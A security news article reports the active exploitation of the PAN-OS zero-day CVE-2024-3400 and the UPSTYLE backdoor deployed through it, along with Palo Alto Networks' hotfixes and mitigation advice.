- ITDM 2025 전망 | 금융 플랫폼 성패, 지속가능한 사업 가치 창출에 달렸다” KB국민카드 이호준 그룹장
- “고객경험 개선하고 비용은 절감, AI 기반까지 마련” · · · AIA생명의 CCM 프로젝트 사례
- 2025年、CIOはAIに意欲的に投資する - そしてその先も
- The best robot vacuums for pet hair of 2024: Expert tested and reviewed
- These Sony headphones eased my XM5 envy with all-day comfort and plenty of bass
Palo Alto Networks Zero-Day Flaw Exploited in Targeted Attacks
Palo Alto Networks has detected targeted assaults exploiting a recently unearthed critical zero-day vulnerability within its PAN-OS software, designated CVE-2024-3400 with a CVSS score of 10.0.
This flaw enables unauthorized actors to execute arbitrary code with root privileges on affected firewalls. Identified as Operation MidnightEclipse, these targeted attacks have been closely monitored following the discovery of the vulnerability.
The vulnerability affects firewalls running PAN-OS 10.2, 11.0 and 11.1 and configured with specific features enabled.
In an advisory published last Friday, Palo Alto Networks confirmed targeted attacks leveraging this flaw, attributing known exploitation to a single threat actor while acknowledging the potential for future exploitation by additional actors.
Operation MidnightEclipse encompasses post-exploitation activities, including the deployment of a Python-based backdoor named UPSTYLE via a cronjob executing commands remotely every minute.
In their advisory, Palo Alto Networks has shared detailed insights into the backdoor’s behavior, including its persistence mechanisms, command execution and cleanup processes.
“Anytime a vulnerability impacts devices directly connected to the Internet, it’s a cause for concern. The fact that these are being actively exploited makes this additionally troublesome,” warned Erich Kron, security awareness advocate at KnowBe4.
“Organizations with vulnerable versions of the operating system should take immediate actions to mitigate the threat by disabling features related to the vulnerability […] while keeping a vigilant watch for potential malicious network traffic or code execution on the devices.”
To address the issue, Palo Alto Networks advised users to apply hotfixes released on Sunday for affected PAN-OS versions and enable specific threat prevention measures. The company is also offering its Unit 42 Managed Threat Hunting XQL queries to help identify signs of exploitation within network logs.
Gratitude is extended to Volexity for discovering the vulnerability, highlighting the significance of collaboration in combating cybersecurity threats.
Read more on this vulnerability: Palo Alto Networks Warns About Critical Zero-Day in PAN-OS
Image credit: Tada Images / Shutterstock.com